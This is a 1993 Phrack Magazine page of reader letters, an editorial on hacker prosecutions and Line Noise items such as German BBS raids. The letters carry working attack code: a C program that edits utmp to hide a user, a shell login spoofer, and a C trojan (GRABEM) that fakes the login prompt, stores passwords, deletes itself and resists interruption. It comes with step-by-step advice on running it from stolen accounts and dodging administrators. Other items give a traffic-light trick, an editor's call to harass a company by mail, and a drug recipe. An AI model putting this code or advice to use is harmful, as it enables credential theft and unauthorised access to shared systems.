[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Phrack Loopback / Editorial Page / Line Noise ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ]
Current issue : #42 | Release date : 1993-01-03 | Editor : Erik Bloodaxe
IntroductionErik Bloodaxe
Phrack Loopback / Editorial Page / Line NoisePhrack Staff
Phrack Pro-Phile on Lord DigitalLord Digital
Packet Switched Network SecurityChris Goggans
Tymnet Diagnostic ToolsProfessor Falken
A User's Guide to XRAYNOD
Useful Commands for the TP3010 Debug PortG. Tenet
Sprintnet Directory Part ISkylar
Sprintnet Directory Part IISkylar
Sprintnet Directory Part IIISkylar
Guide to EncryptionThe Racketeer
The Freedom Of Information Act and YouVince Niel
HoHoConvarious
PWNDatastream Cowboy
Title : Phrack Loopback / Editorial Page / Line Noise
Author : Phrack Staff
                          ==Phrack Magazine==

              Volume Four, Issue Forty-Two, File 2a of 14

                      [-=:< Phrack Loopback >:=-]
============================================================================
      !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
============================================================================

I 'found' this little C program a few days ago, and runs on most UNIX
machines I think (As I found it, I cant claim fame for writing it!).

What it does, is change your userid and x25 address to anything of your
choice. This only affects programs such as 'write' and 'who'. It doesn't
automatically give you different access rights, so it can only be used
to disguise your real identity.

Usage
-----

   inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
   inv ''  ''        (Makes you INVISIBLE on 'who')

Program invis.c
---------------

#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>

#include <lastlog.h>

main(argc,argv)
int argc;
char *argv[];
{
 FILE *f;
 struct utmp u;

 int v=ttyslot(1);
 if(v==-1)
 {
  fprintf(stderr,"Can't find terminal.\n");
  exit(1);

 if(argc!=3)
 {
  fprintf(stderr,"Args!\n");
  exit(1);
 }
 f=fopen("/etc/utmp","r+");
 if(f==NULL)
 {
  fprintf(stderr,"Utmp has escaped!\n");
  exit(1);
 }
 if(fseek(f,v*sizeof(u),0)==-1)
 {
  fprintf(stderr,"Garbage utmp\n");
  exit(1);
 }
 if(fread((char *)&u,sizeof(u),1,f)!=1)
 {
  fprintf(stderr,"Write failed\n");
  exit(1);
 }

 strncpy(u.ut_name,argv[1],8);
 strncpy(u.ut_host,argv[2],16);
 if(fseek(f,v*sizeof(u),0)==-1)
 {
  fprintf(stderr,"Seek failed\n");
  exit(1);
 }
 fwrite((char *)&u,sizeof(u),1,f);
 fclose(f);
}

I personaly have not used this program (to hack or for anything else)
What you do with it is up to you....,
                                                            ________
Have fun...., !!!                                          (        )____
                                                          (  Alas, life  )
                                                        (   is but an   )
                                                        (    Aardvaark.. )
                                                         (       __      )
                                                      .   (_____)  (____)
* * * * * * * * * * * * * * * *                     . ? .       ()
* CHEERS_ THEN - _     _      *                       __      ()
*   ___/_/______|_|___| |__   *                     /    \  ()
*  |________   _______| |__|  *                    |_    _|
*    / /    | | | |   | |     *                   |(0)||(0)|
*   / /___  | | | |   | |     *                  /|_  \/  _|\
*  /___  /  | | | |   | |     *                  || | == | ||
*     / /   | | \  \__/ /     *                  || \____/ ||
*    / /    |_|   \____/      *                 ///\  !!  /\\\
*-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=

-------------------------------------------------------------------------------

I am interested in getting in contact with hackers in Nord Italy
(I am located in Torino). Do you know anybody ?

Can you help TheNewHacker ??

Thanks

TheNewHacker

[Editor:  Actually, we are in the process of recruiting people to
          write for a compilation file on the hacking scenes in countries
          around the world.  One person is working on Italy.  Perhaps when
          this file is completed, you will be able to network through that
          information.
          If anyone in a country other than America is interested in
          contributing to this effort, please write us at:
          phrack@well.sf.ca.us !  ]

-----------------------------------------------------------------------------


hello, i must say i love your publication.  I have a little kind of
hack/phreak for you guys.

When you approach a Red light, preferably at night with few cars around,
continually flash your bright lights.  This tricks the light into believing
this a cop waiting behind traffic at the light thus changing the light after
about 10 flashes.  I discovered that after seeing several police officers turn
on their lights before they hit lights and was amazed on how easily the light
changed.  If you have say, a Mag-lite the trick works if you point directly
at the top of the post-light and the ones hanging right above red on verticals
and right above yellow on horizontals.

hope this helps etc.   (i fucking hate those damn red lights)

Dave.

[Editor:  I've actually tried this.  It works on most major
          intersections]

-----------------------------------------------------------------------------

Hallo !
I'd like to make just some addition to the APPENDIX A of the
Racketeer's article "The POWER of Electronic Mail" - there are
new guys in InterNET -> Russians (!). They have the awful
connection, but it's cool team. So, add :

 .su           kremvax.hq.demos.su

And one more note, in the SMTP installed on the Sun Station I'm working
on there isn't command TICK, but exist some strange like RSET and
EXPN.
      Spy

  P.S. Sorry for my bad English.

[Editor:  Russia has a lot of computers online these days.  Look for
          more on the Russian Internet in upcoming Phracks!]

-----------------------------------------------------------------------------

There is another, much simpler way to expand your password collection,
other than tty spoofing. Why not just run a program that simulates the
login process, and then leave it running on the console for an unsuspecting
victim? A simple example is below. Execute by typing getpass:logout.

--------File: getpass----------
LOGIN=""
PASSWD=""
clear
echo -n "login: "
read LOGIN
echo "$LOGIN" >name
sleep 3
echo -n "Password:"
read PASSWD
echo "$PASSWD" >password
echo
echo -n "Login incorrect"
-------------------------------

The only problem I have is that I don't know how to make it so that
the password, when entered, isn't shown on the screen. I'm sure you
can come up with a solution.


[Editor:  actually, someone kinda did.  See the next letter]

-----------------------------------------------------------------------------

A Better UNIX Password Grabber
by The K-Man


I blame it entirely on boredom.  Well, that and an acute case of end-
of-semester neural gridlock.  I was sitting in the lab a couple of years
ago, my head leaning against a Sparc-2 display, my index finger hitting the
return key over and over again at the login prompt.  It was all my mind and
body were capable of at the time.  Then a little thought formed in the back
of my mind: "You know, it would be pretty damn easy to write a program to
imitate the behavior of this screen while grabbing user id's and passwords."
So I logged in and started coding.  Then I thought to myself, "You know, with
a few extra lines of code and a couple of tricks, I could make this little
guy almost completely undetectable and untraceable while running."  So I
coded some more.  A couple of hours later, out popped the following
program:

---------------------------- Cut Here -----------------------------------

/*----------------------------------------------------------------------+
| GRABEM 1.0            by The K-Man      |
| A Cute little program to collect passwords on the Sun workstations.   |
+----------------------------------------------------------------------*/

#define PASSWORD "Password:"
#define INCORRECT "\nLogin incorrect"
#define FILENAME ".exrc%"

#include <stdio.h>
#include <signal.h>


/*-----------------------------------------------------------------------+
| ignoreSig                 |
|                   |
| Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT.     |
+-----------------------------------------------------------------------*/
void ignoreSig ()
{
 return;
}


/*-----------------------------------------------------------------------+
| Main                    |
+-----------------------------------------------------------------------*/
main()
{

char  name[10],     /* users name             */
  password[10];    /* users password         */



int  i,       /* loop counter               */
  lab,      /* lab # you're running on    */
  procid;      /* pid of the shell we're under  */

FILE  *fp;      /* output file          */


 /*-------------------------------------------------------------------+
 | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\)    |
 | signals so the program doesn't stop and dump back to the shell.    |
 +-------------------------------------------------------------------*/
 signal (SIGINT, ignoreSig);
 signal (SIGTSTP, ignoreSig);
 signal (SIGQUIT, ignoreSig);

 /*-------------------------------------------------------------------+
 | Get the parent pid so that we can kill it quickly later.  Remove   |
 | this program from the account.          |
 +-------------------------------------------------------------------*/
 procid = getppid();
 system ("\\rm proj2");

 /*-------------------------------------------------------------------+
 | Ask for the lab # we're running on.  Clear the screen.    |
 +-------------------------------------------------------------------*/
 printf ("lab#: ");
 scanf ("%d", &lab);
 for (i=1; i<40; i++)
  printf ("\n");
 getchar();

 /*-------------------------------------------------------------------+
 | Outer for loop.  If the name is <= 4 characters, it's probably not |
 | a real id.  They screwed up.  Give 'em another chance.             |
 +-------------------------------------------------------------------*/
 for(;;)
 {
  /*---------------------------------------------------------------+
  | If they hit return, loop back and give 'em the login again.    |
  +---------------------------------------------------------------*/
  for (;;)
  {
   printf("lab%1d login: ",lab);
   gets (name);

   if (strcmp (name, "") != 0)
    break;
  }

  /*---------------------------------------------------------------+
  | Turn off the screen echo, ask for their password, and turn the |
  | echo back on.              |
  +---------------------------------------------------------------*/
  system ("stty -echo > /dev/console");
  printf(PASSWORD);
  scanf("%s",password);
  getchar();
  system ("stty echo > /dev/console");


  /*---------------------------------------------------------------+
  | Write their userid and password to the file.                   |
  +---------------------------------------------------------------*/
  if ( ( fp = fopen(FILENAME,"a") )  != NULL )
  {
   fprintf(fp,"login %s has password %s\n",name,password);
   fclose(fp);
  }

  /*---------------------------------------------------------------+
  | If the name is bogus, send 'em back through         |
  +---------------------------------------------------------------*/
  if (strlen (name) >= 4)
   break;
  else
   printf (INCORRECT);
 }

 /*-------------------------------------------------------------------+
 | Everything went cool. Tell 'em they fucked up and mis-typed and    |
 | dump them out to the REAL login prompt.  We do this by killing the |
 | parent process (console).                                          |
 +-------------------------------------------------------------------*/
 printf (INCORRECT);
 kill (procid, 9);
}

---------------------------- Cut Here -----------------------------------


HOW IT WORKS

You can probably figure this out by reading the code, but I thought I'd
just add some comments on why I did what I did.

The first thing is does is install the signal handler. All it does is trap
SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
this baby is running on can't kill it with a keystroke.  Next, it gets the
parent process ID.  We'll use this later to kill it off quickly.  Then it
proceeds to erase the executable file.  Sysadmins can't find a trojan horse
program that isn't there.

>From here it goes on to imitate the login and password prompts.  You'll
probably have to change the code to get it to imitate the login process on
your particular machine.

When it gets a userid and password, it appends them to an existing file in
the account.  I chose the .exrc, but any dot file will work.  The point being
to use a file that already exists and should be in the account.  Don't leave
any extra suspicious files lying around.

After it writes the uid and password to the file, it bumps the user back
to the real login prompt by killing off the shell that was the parent process
of the program.  The cut is almost instantaneous; the user would have to be
inhumanly observant to notice the transition.


HOW TO USE

Well, first you need an account to run it from.  If your site has guest accounts,
you've got it made.  If not, I'd suggest using a little social engineering to
get one other person's account.  With that account and the program, you can grab
access to many more.  I wouldn't recommend running it from an account that has
your name on it.  That just makes it a little more dangerous than it needs to be.
Of course, if the sysadmin happens to catch the program running on your login,
you can always claim to know nothing.  Say someone else must have gotten your
password and is using your account to escape detection.  He might buy it.  But
if you have the source for the program sitting somewhere in your account, and
they find it, you're fucked.  So it's best to use someone else's account for
the job.

After you've gotten the account you'll be running it from, you'll need to get
the program in that account somehow.  I started off by keeping a copy of the
source somewhere it my account, named with something innocuous and hidden
among bunches of source files, but I got paranoid and started hauling the source
around with me on a bar floppy.  Do whatever suits your level of paranoia.

Copy the source to the account you'll be running it from and compile it.
Trash the source, and name the program something that won't stand out in a
ps list.  selection_svc is a nice innocuous name, and it appears everywhere.
Do a ps on one of your machines and look for processes that hang around for
a long time.  You might want to hide it as a daemon.  Be creative.

Now run the program and sit back and wait.  Or leave and come back later.
When you know that someone has tried to log on to your booby trapped machine,
log back into the account you borrowed to run the program in and vi or emacs (if
you're that kind of person) out the captured userid and password.  Simple as
that.

Note that the two times that you stand the greatest chance of being caught
are when you first compile and run the program and when you retrieve your
captured uid and passwords.  There's the remote chance that someone might see
you at work and see what you're doing, but it's not very likely.  If you start
acting all paranoid you'll draw more attention to yourself than you would have
gotten in the first place.  If your site has dialup lines, you might want to do
a dialin to retrieve the passwords. Or you might prefer to do it in person.
All depends on your paranoia quotient which you think is more secure, I guess.


TIPS

Be careful which dot files you use.  I chose the .exrc because it was something
that wasn't used often at our site.  If you chose the .cshrc or other frequently
accessed file, put a # before the uid and password you write to that file.  That
way,  when that dot file is sourced, it'll treat that line as a comment and not
spit out an error message that could cause suspicion.

Try to run the program at a time when you know there will be heavy machine
usage.  That way you'll trap something quick.  The longer your program
runs, the greater the chance it will be found.

Don't be greedy.  Run on only one or two machines at a time.  And if you run
on more than one machine, run out of a different account on each one.  Again,
the more you put out there, the better the chance that at least one will be
found.


PARTING NOTE

The morning after I wrote this program was the first time I got to use it.  I
set it running on a guest account, the went to a machine across the room to
do some legitimate work.  One of my friends walks in shortly after that, and
we start shooting the shit.  A minute or two later, the sysadmin walks in, sits
down, and logs in to the machine I ran the program on.  I came really close to
dropping my fudge right then and there.  The only thing running through my
mind was "Either I'm totally fucked, or I have root."  Turned out it was choice
B.  Too bad the guy changed his password once a week, and I wasn't smart enough
to fix it so that I would see the change.  Oh well, I had fun for a week though.
There were quite a few interesting e-mail messages sent back and forth that week.
I think the best one was the one from our (male) department head to one of our
radical she-male hard-core no-damn-gifs feminist female professors, detailing
all the perverted sexual acts that he would like to perform with and on her. :)

Anyway, have fun with the program.  Maybe I'll get a chance to come up with
some more cool UNIX programs in the future.


           Later,
            K-Man

-----------------------------------------------------------------------------

        In a recent issue of PHRACK you had some article or loopback about
getting information about people via modem.  I am somewhat interested in
this and could use this information.  I have a friend who is a part-time
bounty hunter and could use such information to track people down.
Could you please send me some information about who to contact to find out
this information.  What I could REALLY use is an on-line up-to-date
phone/address book that I could call to find out anybody's address.  Is
there such a thing?  If you have any information please e-mail me, since I
am unable to get your mag on a regular basis.  Thanx a mil!

                                Scarface

[Editor:  Actually there are quite a large number of databases that keep
          information on everyone.  There is TRW, Equifax, TransUnion,
          Information America and NAI just to name a few.  Many of these
          services are very expensive, but even services like CompuServe
          allow users to look up people all over America using
          PhoneFile which compiles data from all kinds of public
          records.  Nexis can allow you to look up real estate data on
          just about anyone with loans on their houses.  Every public
          utility and department of motor vehicles provides information
          on their records, and many are online.

          A good book to read about this kind of thing is

          Privacy For Sale
          Jeffrey Rothfeder

          Simon & Schuster
          $22.00]
-----------------------------------------------------------------------------
                            THE GOLDEN ERA REBORN!

     Relive the thrill of the golden era of hacking through our exclusive
        collection of BBS messages.  Our collection contains posts from
          over 40 of the most popular hack/phreak BBSes of all time.
       Experience the birth of the computer underground again from your
       own computer with this collection of original posts from bulletin
                                 boards like:

                                   * 8BBS *
                                   * OSUNY *
                                 * PLOVERNET *
                            * THE LEGION OF DOOM *
                             * BLACK ICE PRIVATE *
                            * THE PHOENIX PROJECT *

                               And many more...

               Messages are available in many computer formats:
                                      IBM
                                     Amiga
                                   Macintosh

            For more information, please contact LOD Communications

                      email:  lodcom@mindvox.phantom.com

                         US Mail:  LOD Communications
                                603 W. 13th St.
                                 Suite 1A-278
                               Austin, TX 78701

                           Voice Mail:  512-448-5098
-----------------------------------------------------------------------------

You might like this one...
--bob
****************************************
I just saw a transcript of a press conference given by
Secret Service Agent Frericks, in Lubbock last December.

here is a brief extraction...

FRERICKS: Um hm. This is a major nation wide, world wide problem from
an industry point of view with tremendous losses in funds tremendous
losses of money. the VAX account at the University is a way to get
into numerous other research accounts or Internet which is the ...you
get onto Internet you can talk to anybody else who is on Internet
anywhere in the world which these kids were talking to Belgium, and
Israel and Australia and they can do that just by this, thus avoiding
long distance phone calls.  But most of the people on Internet I mean
on the VAX are there legitimately for research purposes they can go to
Mayo and get a file if they're a med student and they also get one of
these pamphlets if they get, like the Department of Engineering gives
out an account number just for that semester, the professor would give
it out so you can use the VAX well they also get one of those
pamphlets that explains what the rules are and the instructor spends a
good bit of time the first couple of classes going over computer
etiquette, computer rules.

[Editor:  Another of America's finest.]

-----------------------------------------------------------------------------


    I typed this because of the mention of Software Security International in
the article "More than $100,000 in Illegal Software Seized" in Rambone's
Pirates Cove in Phrack 41.
    He mentioned that they were the investigators that finally brought down
APL. I am not only familiar with that, a past friend of mine was
there when the Marshalls took the board. He was there as representative of
SSI.
 The best part that Rambone didn't know, was that they couldn't get into
APL to verify the existence of the software, until they got the password
breaker from Novell. So in essence, they looked like some dumb fools.
They didn't have any idea on how to approach the network.

 Software Security International Can be reached at...
  1-800-724-4197

  2020 Pennsylvania Avenue N.W.
  Suite 722
  Washington, D.C. 20006-1846

That is of course if they finally have gotten off the ground. Last I Heard (2-3
months ago) they were still having trouble getting Financial Backing. They did
the APL Bust for nothing, just to prove they could do it. They are also on a
lot of other BBS's around America. So as a warning to other sysops, Cover your
Ass.

 You could rack up some serious negative cash flow by sending tons of
mail to the box above, then it gets Airborne'd to Washington State.

see ya

[Editor:  I think it might be a good idea to send them a few postcards
          every day for the next few weeks.  Just to stay in touch.]
-----------------------------------------------------------------------------

                         ==Phrack Magazine==

              Volume Four, Issue Forty-Two, File 2b of 14

                        [-=:< Editorial >:=-]

Before I jump upwards onto my soapbox and spew forth a meaty
editorial I would like to relay something to the readers of Phrack.
The following is a transcript of John Lee's  (Corrupt's) confession
to the charges facing him.  (From Security Insider Report, Jan. 1993)

What follows is in my opinion a very poor attempt at a plea-bargain,
and obviously induced by attorney coercion.  I must wonder what John
was thinking when he agreed to this admission.
======================================================================

I agreed with others to violate various laws related to the use of
computers.  I agreed to do the following:

1)  I agreed to possess in excess of fifteen passwords which
    permitted me to gain access to various computer systems
    including all systems mentioned in the indictment and others.
    I did not have authorization to access these systems.  I knew
    at the time that what I did was wrong.

2)  I used these access devices and in doing so obtained the value of time
    I spent within these systems as well as the value of the passwords
    themselves which I acknowledge was more than $1000.

3)  I intentionally gained access to what I acknowledge are Federal interest
    computers and I acknowledge that work had to be done to improve the
    security of these systems which was necessitated by my unauthorized
    access.

4)  I was able to monitor data exchange between computer systems and by
    doing so intentionally obtained more passwords, identifications and
    other data transmitted over Tymnet and other networks.

5)  I acknowledge that I and others planned to share passwords and
    transmitted information across state boundaries by modem or telephone
    lines and by doing so obtained the monetary value of the use of the
    systems I would otherwise have had to pay for.

Among the ways I and others agreed to carry out these acts are the following:

  1.  I was part of a group called MOD.

  2.  The members of the group exchanged information including passwords
      so that we could gain access to computer systems which we were not
      authorized to access.

  3.  I got passwords by monitoring Tymnet, calling phone company
      employees and pretending to be computer technicians, and using
      computer programs to steal passwords.

I participated in installing programs in computer systems that would give
the highest level of access to members of MOD who possessed the secret
password.

I participated in altering telephone computer systems to obtain
free calling services such as conference calling and free billing
among others.

Finally, I obtained credit reports, telephone numbers and addresses
as well as other information about individual people by gaining access
to information and credit reporting services.  I acknowledge that on
November 5, 1991, I obtained passwords by monitoring Tymnet.

I apologize for my actions and am very sorry for the trouble I have
caused to all concerned.

John Lee


==========================================================================


This issue I would like to call attention to what I consider to be
a very pressing issue.  There has always been a trend to pad the
amount of dollar damages incurred to any victim of a hacker attack.
I personally feel that the blame is never directed at the true guilty
parties.

Certainly, if someone is caught breaking into a system, then they are
surely guilty of some form of electronic trespass.  I will also
concede that such a person may or may not be guilty of other crimes
based upon their actions once inside that system.  What I have the
most problems dealing with is the trend to blame the hacker for any
expenditures needed to further secure the system.

With this mindset, why should any corporation bother to add any
security at all?  Why not just wait until someone happens across
a few poorly secured sites, nab them, and claim damages for the
much needed improvements in security?

The worst culprits in this type of behavior has been the RBOCs.  As was
seen with the supposed damages incurred for the distribution of the
"911 document" and most recently with the $370,000 damages supposedly
incurred by Southwestern Bell resulting from the alleged activities
of those in MOD.

Perhaps this figure does have some basis in reality, or perhaps it is
just an arbitrary figure dreamed up by a few accountants to be used
at year end to explain some losses in the corporate stock report.
Most often figures such as this factor in such ridiculous items as
the actual system hardware penetrated.  I can hardly see the relevance
of such a charge.

Even if these charges are to be believed, why isn't the blame being
evenly distributed?  Why aren't stockholders crying for the heads of
system administrators, MIS managers and CIOs?  These are the people who
have not adequately done their jobs, are they not?  If they had expended
a bit of time, and a small amount of capital, the tools exist to make
their systems impervious to attack.  Period.

If I had an investment in a company such as Southwestern Bell, I would be
outraged that the people I was employing to perform data security
functions were not apt enough to keep a group of uneducated gangsters
out of their switching systems.  Why haven't there been any emergency
meetings of shareholders?  Why isn't anyone demanding any changes in policy?
Why is everyone still employed?

Not to blame Southwestern Bell too harshly, they were sorely outclassed
by MOD, and had absolutely no way to cope with them.  Not only because MOD
were competent telco hackers, but because Southwestern Bell's network
service provider had given them free reign.

Southwestern Bell's packet switched network, Microlink II, was designed
and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
An interesting thing I've heard about SWBNET, and about every other subnet
arranged by Tymnet, is that the information concerning gateways, utilities,
locations of node code, etc., is purported to be located in various
places throughout Tymnet internal systems.  One such system, was described
to me as a TYMSHARE system that contained data files outlaying every subnet
on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
and the ONTYME II mail access keys.

If this information is correct, then shouldn't Tymnet be called in to
acknowledge their role in the attacks on Southwestern Bell?

Let's say a Realtor sold you a house, but told you that he would be keeping
copies of all your keys so that he could help you with the maintenance.
Some time later, you notice that a few of your books have been read, but
nothing else is disturbed.  Later on you notice that your tv is on and your
bed is all messed up.  A week later your stereo is gone.  You set up a trap
and catch someone going into your house with your own key!  You find that
the burglars had made copies of all the keys held by your Realtor.  You
then find that the Realtor neglected to put the keys in a safe, and in fact
had left them lying around on the table in his back yard labeled with
the addresses they corresponded to.

Who would you be more upset with?  The individual who copied and used the
keys, or the Realtor for not providing the access to your valuables more
vigilantly?  I would personally be far more upset with the Realtor, for
if he had put the keys in a safe this event would have probably never
transpired.

I'm not saying that people who get caught for breaking into computer
systems should be let go, especially if they can be proven to be involved
in the sale of hacked information for a personal profit.  What I am saying
that if hackers are to be punished so vigorously for what I view as a
predominantly victimless crime, then everyone should have to line
up and take their fair share of the blame.

I think it's high time that the real blame be placed on the corporate
entities who seemingly refuse to acknowledge their role in these
break-ins.  Neglect of duties and lack of responsibility on the part
of the employees, the interconnect carriers, the data network providers,
the hardware vendors, etc. all play a key role in the problems that
exist in the world's data networks today.  In fact, if it were not for
computer hackers, these problems would continue to lie dormant until either
discovered by accident in the field, or the provider decided to go ahead
and illuminate its clients to the existence of such a problem.

I wholeheartedly encourage each and every reader of Phrack to
purchase one share of stock in any corporation you know that has exhibited
such tendencies and take your place on the floor of the next shareholders
meeting and scare the hell out of the board of directors.
Phrack Magazine is calling a discount brokerage very soon.

-------------------------------------------------------------------------------

                         ==Phrack Magazine==

              Volume Four, Issue Forty-Two, File 2c of 14


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

******************************************************************************

                          BBS Busts in Germany
                          ====================


Thursday, March 18, 1993.

This day will be remembered as a black day in German BBS history.
In fact, it was the blackest day in German BBS history since the raid
of 18 Berlin BBS in Berlin and North Germany a couple of months ago.

What has happened?  A couple of Bulletin Board Systems (BBS) have
been raided by the police.  All these BBS had "warez" online, illegal,
pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
This time, most of these BBS were in Bavaria, South Germany.

Now let's take a closer look at the events:

One guy who got busted was MST, Sysop of Southern Comfort BBS
in Munich.  In fact, his board went offline 9 days before.
But he was so unlucky still having his computer and his warez.
He was even using his modem to trade warez at the very moment
the cops rang his doorbell.  Why did he go offline just so short
before he got busted?  His board had been running for over 1 year.

Here is the text file MST released about going offline:

THURSDAY 03-09-93 00:15
THE SOUTHERN COMFORT BBS IS CLOSED !
I AM NOT BUSTED OR ANYTHING LIKE THIS !
I CLOSED THE BBS COS OF PERSONAL REASONS AND
PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
ALIVE AND WILL BE HERE AT A NEW??? OPENING !

SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !

MST/RAZOR 1911

A couple of days later, MST was posting ads in local BBS to sell his
old equipment.  But obviously he wasn't fast enough.  Maybe this was
one of the reasons the cops busted him on March, 18.  They were afraid
he might get rid of his illegal software, so they hurried up to catch him!

He got busted at 10am this morning.  Three cops were knocking on his door,
until he opened.  They had a search warrant and confiscated all his
computer equipment, disks, modems...

Chris used to have a board until four months ago, and now trades for TDT and
other groups.  He was in school this morning.  His parents weren't home
either.  So the cops broke into his house, smashed the wooden door, and
seized all his equipment.  He is asked to speak to the Police this Tuesday.

Chris used to be one of the most active traders for PC warez in Germany.
He and his friend Michelangelo supported boards like Schizophrenia and
Beverly Hills, which they co-sysop'ed.  They were also known as the
'Beverly Hills Boys', a new German cracking group.

After Chris' bust, a couple of boards were affected:
Beverly Hills went offline.  Also the German Headquarters of the Beverly
Hills Boys, 'Twilight Zone', went offline.  Their sysops estimate at least
1-3 months offline time.

The other Munich BBS and their sysops were really scared after the bust
and took down their systems for an uncertain amount of time.

One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
every warez collector.  It had 8 modems hooked up (all US Robotics Dual
Standard 16.8) and one ISDN Line.

It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
would be put online according to user' requests.

But then, March 18 arrived, and the dream was shattered.
Its sysop, Rider, who was happily calling boards the previous day,
had the most shocking experience in his life.  The cops came and
took his BBS.

And more..
Ego, co-sysop of a large German BBS, got busted.
Andy/Spreadpoint (ex-sysop) got busted.
And lots of others...

Unlike the US Secret Service, which delights in seizing all
electronic equipment, like stereos, TVs, VCRs, the German cops
were just after the computer hardware, especially the hard drives
and file servers.

They usually come with three or four people.  All of the search warrants
they were using were quite old, issued last December.

Who is behind those actions?
First of all the BSA, Business Software Association.  They
were also responsible for the recent raids of US Bulletin Boards.
In Germany they just announced actions against piracy and
bulletin boards.  The most active BSA Members are Microsoft and
Lotus Development.  Microsoft, Lotus and the BSA are all located
in Munich, Germany, home of German's most feared lawyer,
Guenther Freiherr von Gravenreuth.  This guy has been fighting
for years against piracy, young kids who copy games, and especially
bulletin board systems.  He is also affiliated with Ariolasoft, a huge
German distributor for game labels like Activision and others.

In the end, all I can say is:
Be aware, don't get caught and don't keep illegal stuff on your board!

                  (c) 1993 SevenUp for Phrack

******************************************************************************

Carlcory's brownies:

/* Begin cc_brownie.c */

Includes:
#include "4_squares_baking_chocolate"
#include "1_cup_butter"
#include "2_cups_sugar"
#include "4_eggs"
#include "2_cups_flour"
#include "2_tbs_vanilla"
#include "1_third_cup_marijuana"        /*comment out if won't compile
                                            on your system*/
#include "1_cup_nuts"                   /*comment out if won't compile*/

void main(void);

{
    heat(oven, 350);
    add(butter, chocolate);
    while(texture!='smooth')    {
        stir(mixture);
    }
    Add(sugar);
    add(eggs);
    add(vanilla);
    add(flour, pot);
    add(nuts)
    for(timer=0; timer<35; timer++) {
        bake(mixture);
    }
    cool(hour);
}


/*The high takes about an hour to come on,
 but lasts for 12 hrs. (4 brownies)
 Make sure they cool (don't burn your mouth!)
 and share with friends! */


/*End of cc_brownie.c*/

******************************************************************************

GRAY AREAS
Examining the Gray Areas of Life

Gray Areas, Inc.
P.O. Box 808
Broomall, PA  19008-0808
(215)353-8238
grayarea@well.sf.ca.us


Gray Areas is published quarterly and printed on recycled paper.  They also
participate in local recycling efforts involving cans, glass, clothing,
newspapers, and more.

A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
funds).  A 12-issue subscription costs $50.00 ($75.00 foreign).  You may
purchase a twelve issue subscription and give 4 or 8 or those issues away as
gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
recipients). Make check or money order out to Gray Areas, Inc.

STATEMENT OF PURPOSE:

Gray Areas exists to examine the gray areas of life.  We hope to unite people
involved in all sorts of alternative lifestyles and deviant subcultures.  We
are everywhere!  We felt that the government has done a great job of splitting
people up so that we do not identify with other minority groups anymore.  There
are so many causes now that we often do not talk to others not directly
involved in our chosen causes.  We believe that the methods used to catch
criminals are the same regardless of the crime and that much can be learned by
studying how crimes in general are prosecuted and how people's morals are
judged.  It is our mission to educate people so they begin to case more about
the world around them. Please join our efforts by subscribing, advertising your
business with us, and by spreading the word about what we're up to.

__________________________

Review by Knight Lightning:

I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
and with a cover price of $4.50 (US).  I was impressed with both the laser
quality of the printing, artwork, and graphics, as well as the topics and
content of the articles.

I would not characterize Gray Areas as a hacker magazine, but the subject did
come up in an interview with John Perry Barlow (one of the original founders of
the Electronic Frontier Foundation) where he discussed the EFF and its role in
defending civil liberties.

No, instead I think it is safe to say that Gray Areas pays a lot of attention
to the Grateful Dead.  Indeed the cover story is titled "Grateful Dead
Unauthorized Videos."  Additionally, there are several other articles
(including the John Barlow interview) that discuss varying aspects about the
Dead's history, their politics, and of course their music.  An advertisement
for the next issue of Gray Areas reveals that even more articles relating to
the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
fall in love with this magazine!

However, the article that I appreciated most was "Zine Scene," a review of 163
alternative newsletters that included such familiar names as 2600, Hack-Tic,
Full Disclosure, and TAP; and others that I intend to take a look at like Iron
Feather's Journal and bOING bOING.  The zines reviewed here covered every topic
imaginable and I thought it was a great buffet for the mind to have such handy
directory (especially since Factsheet Five went defunct about a year ago).

Other interesting articles had to do with video, audio, and software piracy and
reviews of music and software.  I also enjoyed the great artwork found
throughout the magazine in the form of visual aids, comics, and advertisements.

If you are a fan of alternative music or the Grateful Dead, you'll be very
sorry if you don't subscribe immediately.  If you are interested in alternative
publications with more interesting points of view than Time or Newsweek then
you owe it to yourself to at least purchase a copy to check it out.

